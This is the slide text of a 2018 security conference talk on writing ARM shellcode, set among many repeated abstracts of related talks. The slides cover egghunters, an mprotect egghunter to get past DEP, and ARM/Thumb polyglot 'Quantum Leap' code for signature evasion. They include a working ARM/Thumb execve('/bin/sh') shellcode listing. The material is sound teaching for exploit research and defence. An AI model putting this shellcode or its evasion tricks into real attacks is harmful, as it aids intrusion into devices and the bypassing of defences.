Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.
In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques.
Slides from my presentation on ARM Shellcode at #44CON 2018, London.
In this talk, we explore ARM egghunting and "Quantum Leap" code - polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques.
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.
In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques
My talk on creating ARM/Thumb Polyglot shellcode for obfuscation, signature evasion and downright novelty of approach! Presented at Hack in the Box Amsterdam 2019
Slides from my presentation on ARM Shellcode at #44CON 2018, London.
In this talk, we explore ARM egghunting and "Quantum Leap" code - polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques.
Make ARM Shellcode Great Again - HITB2018PEKSaumil Shah
Compared to x86, ARM shellcode has made little progress. The x86 hardware is largely homogenous. ARM, however, has several versions and variants across devices today. There are several constraints and subtleties involved in writing production quality ARM shellcode which works on modern ARM hardware, not just on QEMU emulators.
In this talk, we shall explore issues such as overcoming cache coherency, reliable polymorphic shellcode, ARM egghunting and last but not the least, polyglot ARM shellcode. A bonus side effect of this talk will be creating headaches for those who like to defend agaisnt attacks using age old signature based techniques
My talk on creating ARM/Thumb Polyglot shellcode for obfuscation, signature evasion and downright novelty of approach! Presented at Hack in the Box Amsterdam 2019
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
Testing is important. That’s a well known fact that very few developers will dispute. Why is then so little kernel code covered by a clear testing strategy ? Through real stories about test plans (or the lack thereof), this talk will convince you that none of your excuses for not having a test strategy are valid. You will learn how various parts of the Linux kernel have approached testing and how you can benefit from their experience. The talk will use the V4L2 subsystem to demonstrate the use of test tools, but will be applicable to kernel development in general.
Laurent Pinchart
A quick tutorial on what debuggers are and how to use them. We present a debugging example using GDB. At the end of this tutorial, you will be able to work your way through a crash and analyze the cause of the error responsible for the crash.
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe FitzPatrick
Most dismiss power side channel attacks as difficult, expensive and unlikely, and are therefore out of scope for many security evaluations. Recent presentations have demonstrated how to get this cost down to a few hundred dollars using low-cost, high performance analog components alongside current high performance FPGAs.
By simplifying both the target hardware and the analysis, I aim to present a series of simple examples of timing and power analysis attacks on microcontroller hardware that require no advanced math and can be done in the comfort of your home for less than $20 in parts
Codemotion Rome 2015 - Building a drone from scratch with spare parts is a challenging business. To accomplish this journey, a Linux embedded stability control system is developed entirely from 0.This is a journey starting from the hardware choosing (a home WIFI router), to a stable and real flight. Unconventional implementations are one of the main topic, like using WiFi as communication between drone and pilot, HTML5 and COMET to show telemetry from the router web server, and implementing a entirely new protocol based on 802.11 Beacon Frames to prevent deauthentication attacks.
Automatic Generation of Compact Alphanumeric Shellcodes for x86Aditya Basu
Shellcode can be viewed as machine language code that is injected in the form of string input to exploit buffer overflows. It usually contains non-ASCII values because not all machine instructions encode into ASCII values. Many applications allow arbitrary string input, even though only strings containing characters that are ASCII or a subset of ASCII are deemed valid. Thus a common defense against shellcode injection is to discard any string input containing non-ASCII characters. Alphanumeric shellcode helps attackers bypass such character restrictions. It is non-trivial to construct alphanumeric shellcodes by hand and so tools have been created to automate the process. The alphanumeric equivalent, generated by the existing tools, is much larger than the original shellcode. This paper presents two new encoding schemes to reduce the size of the alphanumeric equivalent. A smaller shellcode is better as it can fit into smaller buffers and is even more useful in case an application restricts the input size. Results show that the size reduction of the encoded shellcode is more than 20% for many shellcodes.
This talk gives a short introduction into buffer overflows, how to exploit them and which counter measures are used in openSUSE Linux to make exploitation harder.
We'll cover stack canaries, fortify source, address space layout randomization and NX. We'll see how they work and how they can be circumvented in a live demo of a working exploit that manages to circumvent these security measures.
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
The Linux kernel is a very complex beast living in millions of households and data centers around the world. Normally, you’re not supposed to notice its presence but when it gets cranky because of something not suiting it, it spits crazy messages called colloquially
oopses and panics.
In this talk, we’re going to try to understand how to read those messages in order to be able to address its complaints so that it can get back to work for us.
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
Testing is important. That’s a well known fact that very few developers will dispute. Why is then so little kernel code covered by a clear testing strategy ? Through real stories about test plans (or the lack thereof), this talk will convince you that none of your excuses for not having a test strategy are valid. You will learn how various parts of the Linux kernel have approached testing and how you can benefit from their experience. The talk will use the V4L2 subsystem to demonstrate the use of test tools, but will be applicable to kernel development in general.
Laurent Pinchart
A quick tutorial on what debuggers are and how to use them. We present a debugging example using GDB. At the end of this tutorial, you will be able to work your way through a crash and analyze the cause of the error responsible for the crash.
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe Fitz...44CON
44CON 2014 - Simple Hardware Sidechannel Attacks for 10 GBP or Less, Joe FitzPatrick
Most dismiss power side channel attacks as difficult, expensive and unlikely, and are therefore out of scope for many security evaluations. Recent presentations have demonstrated how to get this cost down to a few hundred dollars using low-cost, high performance analog components alongside current high performance FPGAs.
By simplifying both the target hardware and the analysis, I aim to present a series of simple examples of timing and power analysis attacks on microcontroller hardware that require no advanced math and can be done in the comfort of your home for less than $20 in parts
Codemotion Rome 2015 - Building a drone from scratch with spare parts is a challenging business. To accomplish this journey, a Linux embedded stability control system is developed entirely from 0.This is a journey starting from the hardware choosing (a home WIFI router), to a stable and real flight. Unconventional implementations are one of the main topic, like using WiFi as communication between drone and pilot, HTML5 and COMET to show telemetry from the router web server, and implementing a entirely new protocol based on 802.11 Beacon Frames to prevent deauthentication attacks.
Automatic Generation of Compact Alphanumeric Shellcodes for x86Aditya Basu
Shellcode can be viewed as machine language code that is injected in the form of string input to exploit buffer overflows. It usually contains non-ASCII values because not all machine instructions encode into ASCII values. Many applications allow arbitrary string input, even though only strings containing characters that are ASCII or a subset of ASCII are deemed valid. Thus a common defense against shellcode injection is to discard any string input containing non-ASCII characters. Alphanumeric shellcode helps attackers bypass such character restrictions. It is non-trivial to construct alphanumeric shellcodes by hand and so tools have been created to automate the process. The alphanumeric equivalent, generated by the existing tools, is much larger than the original shellcode. This paper presents two new encoding schemes to reduce the size of the alphanumeric equivalent. A smaller shellcode is better as it can fit into smaller buffers and is even more useful in case an application restricts the input size. Results show that the size reduction of the encoded shellcode is more than 20% for many shellcodes.
This talk gives a short introduction into buffer overflows, how to exploit them and which counter measures are used in openSUSE Linux to make exploitation harder.
We'll cover stack canaries, fortify source, address space layout randomization and NX. We'll see how they work and how they can be circumvented in a live demo of a working exploit that manages to circumvent these security measures.
Kernel Recipes 2013 - Deciphering OopsiesAnne Nicolas
The Linux kernel is a very complex beast living in millions of households and data centers around the world. Normally, you’re not supposed to notice its presence but when it gets cranky because of something not suiting it, it spits crazy messages called colloquially
oopses and panics.
In this talk, we’re going to try to understand how to read those messages in order to be able to address its complaints so that it can get back to work for us.
Debuggers are one of the most important tools in the programmer’s toolkit, but also one of the most overlooked pieces of technology. They have to work in some of the harshest conditions, supporting a huge set of programming languages and aggressive transformations by compilers. What makes them work? And when don’t they work?
In this talk, we will take you on a journey to some of the darkest and most confusing pits of systems programming involving debug formats, compilers and process control. we will describe situations where debuggers have failed you, and why. wef you’re not hacking on debuggers and are not a masochist, you will walk away with an increased appreciation of life.
You have one of those fruity *Pi arm boards and cheep sensor from China? Some buttons and LEDs? Do I really need to learn whole new scripting language and few web technologies to read my temperature, blink a led or toggle a relay? No, because your Linux kernel already has drivers for them and all you need is device tree and cat.
Pragmatic Optimization in Modern Programming - Mastering Compiler OptimizationsMarina Kolpakova
Explains compilers optimizations, gives taxanomy and examples. The examples are mostly compiler for ARM armv7-a and armv8-a targets, but most of optimizations are machine independent.
For over two decades, working as an cybersecurity entrepreneur, researcher and instructor, I have heard over and over again that attacks and defense are two sides of the same coin. But what does it really mean in application? What happens when sophisticated attacks collide with sophisticated defenses? Who wins?
This is talk is aimed at a wide audience in cybersecurity – from the strategists to the practitioners. We will discuss Evolution, Attacks, Defense and PEBKAC. What factors shall affect the posture of trustworthiness and safety in the digital world in the next two years to come depend largely on the road we have followed over the past two decades. This talk looks above and beyond, albeit optimistically, about realigning some of the conventional approaches, slowly but strategically shifting mindsets of stakeholders and consumers alike, to bring about a more proactive approach to security.
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSSaumil Shah
The EMUX IoT Firmware Emulation Framework currently provides near native userland emulation for ARM and MIPS IoT devices. EMUX is actively used Saumil's popular ARM IoT Exploit Laboratory training for over 5 years.
The Debugging with EMUX workshop shall be in two parts:
Part 1 (30 minutes) - Setting up EMUX in 7 minutes - A tour of EMUX internals - EMUX utilities - Tracing userland processes within EMUX
Part 2 (90 minutes) - Debugging an ARM IoT target in EMUX - Debugging a MIPS IoT Target in EMUX - Crash dump analysis
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkSaumil Shah
After 4 years, ARMX is changing its call sign. EMUX now features both ARM and MIPS device emulation, in a unified framework! Join us as we unveil EMUX and take you into the inner workings of emulating both ARM and MIPS IoT devices. We will be releasing a new Docker image featuring a MIPS CTF challenge to test your MIPS exploit development skills.
Slides from my workshop at Ringzer0's December 2021 Workshop Advent Calendar.
Effective Webinars: Presentation Skills for a Virtual AudienceSaumil Shah
A webinar on what it takes to conduct an effective webinar! Understand how to prepare your story for an invisible audience, keep them engaged and anticipate "in-flight turbulence". Enjoy!
The closest you will get to a VM for testing IoT devices. The ARM-X IoT Firmware Emulation Framework is a tried-and-tested framework which has led to four 0-days discovered on SoHo routers, IP cameras and VoIP exchanges. In this talk, I shall cover the evolution of ARM-X, demonstrate a few use cases and discuss future directions of IoT firmware emulation.
The closest you will get to a VM for testing IoT devices. The ARM-X IoT Firmware Emulation Framework is a tried-and-tested framework which has led to four 0-days discovered on SoHo routers, IP cameras and VoIP exchanges. In this talk, I shall cover the evolution of ARM-X, demonstrate a few use cases and discuss future directions of IoT firmware emulation.
The Road To Defendable Systems - Emirates NBDSaumil Shah
"Attack is a technical problem, defense is a political problem". For several years, cyber security has been misjudged as risk reduction. On one hand, business applications and architectures are growing rapidly. On the other hand, the cyber security organisation is struggling to be able to defend them in today's rapidly evolving threat landscape.
This talk explores the gap in thought between the owner and the defender of today's business applications and what needs to be done to bridge it. We shall present proactive steps and measures to overcome the last hurdle in building defendable systems.
Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face - the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge
Defending an enterprise is a balancing act. I have worked as an offensive testing vendor to several global organisations over 18 years. This talk explores the challenges that today’s CISOs face - the threat landscape, overall shortage of infosec expertise, the ever evaporating shelf life of infosec products and an increased burden of compliance requirements. I will share my experiences from working with highly effective CISOs and internal infosec teams and what it takes to function on the razor’s edge
Slides from my lectures on Photography As An Art Form. Follow me on facebook at https://www.facebook.com/my.spectral.lines and on Instagram at @therealsaumil.
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopSaumil Shah
Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.
In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.
The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.
Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.
In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.
The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
HackLU 2018 Make ARM Shellcode Great Again
1. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Make ARM Shellcode Great Again
Saumil Shah
@therealsaumil
17 October
2018
2. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
# who am i
CEO Net-square.
• Hacker, Speaker, Trainer,
Author.
• M.S. Computer Science
Purdue University.
• LinkedIn: saumilshah
• Twitter: @therealsaumil
3. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Agenda
• A background on ARM shellcode
• My research around ARM shellcode
– cache coherency (solved before)
– space limitations - ARM mprotect Egghunter
– polyglot tricks - ARM Quantum Leap shellcode
• Demos
5. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
heap
stack
Lib
Lib
Binary
overflow
pointer
ROP
shellcode
shellcode
shellcode
Shellcode in tight spaces
• What if payload exceeds
size "constraints"?
– Overwrite local variables.
– Bottom of the stack.
• Many solutions.
SEGFAULT!
SEGFAULT!
6. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Egghunter
• Searches for an EGG (4+4 byte value) in the
process memory.
• Uses syscalls to determine whether a
memory page exists or not (safely).
• Upon finding it, Egghunter transfers the
control to the code following the egg.
• Nothing new here - done before.
8. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Egghunter - DEP
• If Egg+shellcode is in a different memory
region, then it may not be executable
– Overflow in the stack
– Shellcode in the heap
• Enter the mprotect egghunter!
11. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Example: ARM execve() Shellcode
.section .text
.global _start
_start:
.code 32
add r1, pc, #1
bx r1
.code 16
adr r0, SHELL
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #7]
mov r7, #11
svc #1
.balign 4
SHELL:
.ascii "/bin/shX"
Switch to
Thumb mode:
branch pc + 1
• Rest of the shellcode
implemented in
Thumb mode.
• Compact, avoids bad
characters, etc.
12. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Some Concerns
• The "I can signature this" debate.
– YARA Rules, IDS, Bro, blah blah…
• What if our target runs on a Thumb-only
processor?
– for example: Cortex-M
One Shellcode To Run Them All
13. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
"Quantum Leap" Shellcode
Start in THUMB modeStart in ARM mode
THUMB shellcode
(execve, reverse, …)
THUMB shellcode
(execve, reverse, …)
"LEAP"
TO
THUMB
PASS THROUGH
PASS THROUGH
PASS THROUGH
Quantum
Leap
Same
Same
But
Different
14. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
"Quantum Leap" - what we need
• An understanding of ARM and Thumb
instruction encoding:
– ARM instruction: "DO SOMETHING"
– 2 THUMB instructions: "PASS THROUGH"
• Conditional Execution in ARM instructions
– very helpful!
• A little bit of luck and perseverance.
• Nomenclature Credit: "dialup" @44CON.
15. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
The ARM to Thumb switch
• Avoid "destructive" instructions
– Branches, Load/Store, Floating Point, etc.
• Should work on ARMv6 (no Thumb2)
• Avoid Illegal instructions.
0: e28f1001 add r1, pc, #1
4: e12fff11 bx r1
8: 270b movs r7, #11
a: beff bkpt 0x00ff
0: 1001 asrs r1, r0, #32
2: e28f b.n 524
4: ff11 e12f vrhadd.u16 d14,d1,d31
8: 270b movs r7, #11
a: beff bkpt 0x00ff
ORIGINAL ARM CODE "THUMB VIEW"
16. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
ARM and THUMB decoding - 1
e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1
4 BYTE ARM INSTRUCTION - add r1, pc, #1
conditional
opcodestatus
operand
1
destination
operand
2
Thumb instruction 2
Thumb instruction 1
• Controlled by
opcode and
conditional flags.
• Partially influenced
by the first
operand.
• Trickier to control.
• Controlled by
Operands of the
ARM instruction.
• Easier to control.
im
m
ediate
17. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
ARM and THUMB decoding - 1
e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1
1001 0001 0000 0000 0001 asrs r1,r0,#32
e28f 1110 0010 1000 1111 b 524
1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS:
conditional
opcodestatus
destination
operand
2
im
m
ediate
Branch instructions
are destructive
Thumb Opcode 2
influenced by ARM
conditional bits
operand
1
Thumb Opcode 1
influenced by ARM
destination operand
18. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
(Un)conditional Instructions
• How can we turn an ARM instruction into a
conditional instruction…
• …with guaranteed execution everytime?
• COMPLIMENTARY CONDITIONS.
• One of the instructions is guaranteed to
execute, irrespective of condition flags.
e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5
028f1001 addeq r1, pc, #1
UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
19. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
ARM and THUMB decoding - 2
128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5
1005: 0001 0000 0000 0101 asrs r5,r0,#32
128f: 0001 0010 1000 1111 asrs r7,r1,#10
028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1
1001: 0001 0000 0000 0001 asrs r1,r0,#32
028f: 0000 0010 1000 1111 lsls r7,r1,#10
USING CONDITIONAL ARM INSTRUCTIONS:
conditional
opcodestatus
destination
operand
2
im
m
ediate
No destructive
instructions in
Thumb mode
Complimentary
Conditional ARM
instructions
operand
1
21. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Assembling the Quantum Leap
• No Thumb2 instructions.
• No NULL bytes.
• Took many iterations to finalise!
• bx sl implemented by push {sl}, pop {pc}.
• Register list proved to be a challenge.
• Registers r4, sl altered in ARM.
• Registers r0, r1, r2, r5 altered in Thumb.
23. NETSQUARE (c) SAUMIL SHAHhack.lu 2018
Conclusion
• ARM/Thumb Polyglot instructions and
conditional execution offer many
opportunities for obfuscation and
signature bypass.
• Lots of exploration opportunities in ARM
shellcoding.
https://github.com/therealsaumil/arm_shellcode